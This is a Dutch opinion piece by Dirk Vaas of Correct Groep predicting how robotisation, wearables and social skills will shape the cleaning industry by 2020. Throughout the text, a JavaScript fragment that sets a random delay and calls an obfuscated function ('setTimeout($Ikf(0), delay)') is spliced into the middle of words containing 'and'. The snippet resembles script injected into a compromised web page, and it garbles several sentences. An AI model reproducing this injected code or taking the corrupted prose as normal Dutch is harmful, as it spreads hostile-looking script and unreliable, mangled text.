Schoonmaakwereld 2020: wat brengt het ons?

Schoonmaakwereld 2020: wat brengt het ons? Veel robotisering? Een collectieve hang naar sociale innovatie?

Vijf jaar vooruitkijken, het lijkt dichtbij maar er kan veel gebeuren. En dat wordt ook verwacht, als we ons oor te luister leggen bij diverse relaties. Dus kan 2020 gevoelsmatig ook heel ver weg liggen. De verwachting is dat handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andmatig gestandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andaardiseerd werk steeds meer gaat verdwijnen. Immers, technologie automatiseert steeds meer en beter.

In de schoonmaak wordt vaak sceptisch naar robotisering gekeken. De apparaten zijn te klein en te duur en ze pakken het werk van schoonmakers af. Het zou een einde maken aan het zo vertrouwde tijdperk van uurtje-factuurtje. Daar waar Nissan voorspelt dat zelfsturende auto’s in 2016 op de snelweg rijden en in 2020 in de steden, daar stelt de schoonmaak zich iets bescheidener op. Enkel het schoonmaakbedrijf dat zich wil onderscheiden in innovatie, staat nu al open voor robotisering.

In 2020 zal de robotisering veel verder zijn dan nu: grotere machines, meer intelligentie en zelfstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andiger. Uitdaging blijft natuurlijk dat schoonmaken werk is met veel variatie. En dat is nu eenmaal moeilijker te robotiseren. Dus de mens blijft nodig, zij het in een andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere rol.

Gaat dan alles verandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen in de schoonmaak? Nee, de schoonmakers blijven onze kracht, ons kapitaal. Waar enerzijds hoogwaardige kennis en specialisme blijven, daar blijft andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderzijds plaatsgebonden maatwerk. Met als succesfactor de ‘mens’, met goede vak- en sociale vaardigheden. zelfstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andig, betrokken en geassisteerd door apps en wearables. En natuurlijk met nóg betere en duurzame schoonmaakmaterialen en -hulpmiddelen. Kortom, de multiservice schoonmaker met hospitality in het bloed en een wearable om zijn of haar pols wordt het ‘straatbeeld’ in 2020.

Dirk Vaas
Correct Groep